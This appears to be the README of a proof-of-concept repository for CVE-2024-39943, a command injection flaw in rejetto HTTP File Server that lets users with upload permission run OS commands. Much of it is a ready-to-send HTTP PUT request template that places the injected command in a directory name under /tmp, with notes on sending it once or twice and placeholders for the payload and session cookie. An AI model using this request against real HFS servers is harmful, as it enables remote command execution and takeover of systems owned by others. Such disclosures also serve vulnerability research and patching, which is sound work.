# CVE-2024-39943-Poc
CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

Deploy: ``` ./hfs --config config.yaml ```

## Poc: user admin

## Poc: user guest

## update 6/7/2024: Poc user guest

Payload is directory name exist , If the directory does not exist, you need to send the request twice. In the video, because a directory with the name contain payload already exists on the HFS server, I only need to send the request once
PUT /tmp/{{payload}}/poc11.txt HTTP/1.1
Host: <host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: {{Cookie}}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11